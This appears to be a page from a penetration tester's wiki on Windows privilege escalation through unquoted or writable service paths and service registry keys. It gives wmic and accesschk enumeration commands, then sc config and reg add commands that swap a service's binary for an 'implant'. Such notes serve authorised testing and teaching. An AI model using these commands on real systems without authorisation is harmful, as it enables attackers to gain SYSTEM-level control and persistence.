Unsecure Service Path

(run in cmd) query service:

sc qc SERVICE
wmic service get name,displayname,pathname,startmode

Unquoted Service Path:

Search for unquoted:

wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

If the service path is stored unquoted, whenever Windows starts the service it will attempt to run an executable from all paths, i.e. is service is stored in a path such as C:\Program Files\My Program\My Service\service.exe, the service will attempt to execute following paths:

C:\Program.exe

C:\Program Files\My.exe

C:\Program Files\My Program\My.exe

C:\Program Files\My Program\My service\service.exe

Writeable Services:

Accesschk:

accesschk.exe -accepteula -wuvc "Everyone" *

accesschk.exe -accepteula -wuvc "Authenticated Users" *

Update Service:

sc qc SERVICE
sc stop SERVICE
sc config SERVICE binpath="C:\PATH\implant.exe"
sc start SERVICE

Hive:

check access:

accesschk.exe -accepteula -kvuqsw hklm\System\CurrentControlSet\Services > regs.txt

check for NT Authority\Authenticate Users - bingo if KEY_ALL_Access

update to implant:

reg add HKLM\SYSTEM\CurrentControlSet\Services\SERVICE /v ImagePath /t REG_EXPAND_SZ /d C:\PATH /f

probs have to reboot as wont be able to restart the service

PreviousCredentials enumeration NextUnsecure Path security

Last updated 3 years ago